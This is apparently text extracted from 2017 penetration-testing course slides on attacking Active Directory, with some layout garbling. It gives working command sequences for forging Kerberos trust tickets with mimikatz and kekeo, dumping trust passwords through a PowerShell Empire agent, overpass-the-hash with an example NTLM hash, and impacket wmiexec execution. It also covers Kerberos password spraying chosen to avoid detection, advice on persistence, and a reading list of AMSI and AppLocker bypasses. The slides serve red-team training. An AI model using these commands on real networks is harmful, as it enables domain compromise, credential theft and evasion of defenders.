>> kerberos::golden /domain:current_domain /sid:current_domain’s_SID
/rc4:trust_password_NTLM_hash /user:Administrator /service:krbtgt
/target:external_domain_FQDN /ticket:path_to_save_the_TGS

PT e treme - Caendra Inc. © 2017

Trust Tickets

Once the trust ticket is created, we can use kekeo’s asktgs to

get a TGS for any targeted service in the external domain. For
example, for the cifs service we would execute:
>> .\asktgs path_of_the_trust_ticket cifs/domain_controller_of_external_domain

If we now inject that TGS, using kekeo’s Kirbikator we will be

able to access the targeted service, on the external domain.
>> .\Kirbikator lsa path_to_TGS

PT e treme - Caendra Inc. © 2017

Trust Tickets

It should be noted that the targeted domain must have

explicit permissions set for groups or users in the trusted
domain, something which is not uncommon.

PT e treme - Caendra Inc. © 2017

Trust Tickets

How to forge a Trust Ticket for an internal trust to the AD forest

Mimikatz can also extract all internal trust password data from an AD domain.
For example, we would execute the following when interacting with a
PowerShell empire agent to extract all internal trust password data.

>> usemodule credentials/mimikatz/command

>> set Command set Command lsadump::trust /patch

Mimikatz
patches the
PT e treme - Caendra Inc. © 2017 LSASS process
Trust Tickets

We can use this trust NTLM password to forge a trust ticket

and compromise the parent.

To forge a trust ticket for an internal trust, you can follow the
same procedure we used for an external trust.

PT e treme - Caendra Inc. © 2017

To conclude the Kerberos ticket’s subject, if you happen to be
in possession of a valid password, but NTLM is disabled, you
can configure Kerberos in your attacking machine to
checkout a TGT.

PT e treme - Caendra Inc. © 2017

One way to do this is the following, using impacket. Suppose
we identified the ‘2ndAdmin’ user’s credentials.

>> kinit [email protected]

>> KRB5CCNAME=/tmp/krb5cc_0 python wmiexec.py -k -no-pass

els.local/[email protected]

-k indicates that
we are using
Kerberos
authentication
(i.e. the TGT we
created with the
kinit command)

PT e treme - Caendra Inc. © 2017

If you happen to be in possession of a valid password hash
and NTLM is disabled, you can OverPass-the-Hash, as
follows.
>> ktutil -k ~/mykeys add -p [email protected] -e arcfour-hmac-md5 -w
49623ccc820122ab49b3f0f571b77186 --hex -V 5

>> kinit -t ~/mykeys [email protected]

>> KRB5CCNAME=/tmp/krb5cc_0 python wmiexec.py -k -no-pass

els.local/[email protected]

Switching the NTLM

password hash of
the 2ndAdmin user
into a Kerberos
ticket.
PT e treme - Caendra Inc. © 2017
Finally, if you perform password spraying over SMB (for
example via metasploit’s smb_login module), chances are
you will get caught. Kerberos is stealthier for that. You can
use Kerberos for password spraying using this script.
>> ./kinit_user_brute.sh domain domain controller username_list password

PT e treme - Caendra Inc. © 2017

Persisting in Active Directory
There are numerous ways in which an attacker can persist on
Active Directory. Actually, a large percentage of the AD
attacks we covered can be used for persistence. We suggest
that you use persistence methods that involve ACL
backdooring, editing existing GPOs or even better, editing
user objects.

The choice is yours…

PT e treme - Caendra Inc. © 2017
Making a State-Backed
Implant Invisible

PT e treme - Caendra Inc. © 2017

PT e treme - Caendra Inc. © 2017
Kerberos Explained RADIUS

SSO LDAP

NTLM Kerberos Authentication Overview

Replay Attacks Pass-the-Ticket

Over-pass-the-Hash Kerberoast

Forged Tickets – Golden/Silver Diamond PAC

MS14-068 Skeleton Key

Understanding Active Directory Active Directory Security

PT e treme - Caendra Inc. © 2017

Windows Server 2012 R2 Inside Out: Active
Active Directory Architecture Directory Architecture

intercepter-ng Group Policy

Are you really protected against Group Policy
SYSVOL Bypass and Remote Code Execution?

Cain APR - ADP

Seth passwordless RDP session hijacking

PCredz Responder

snarf AppLocker

Device Guard with UMCI bypasses AMSI, using reflection

PT e treme - Caendra Inc. © 2017

WMF5 AMSI and autologging bypass

Bypassing AMSI using PowerShell 5 DLL Hijacking Bypass via COM hijacking

PSAmsi Invoke-AmsiBypass.ps1
How to Bypass Application Whitelisting and
PS-Attack Constrained Powershell

Exploiting PowerShell Code Injection to Bypass

Constrained Language Mode PyKEK

kekeo suite MS14-068 and KrbCredExport

Kinit_user_bruter.sh S4U2Pwnage

Pass-the-Hash is Dead: Long Live

LocalAccountTokenFilterPolicy Group Policy Preference

PT e treme - Caendra Inc. © 2017

2.2.1.1.4 Password Encryption JtR

tgsrepcrack.py Still Passing the Has 15 Years Later

PT e treme - Caendra Inc. © 2017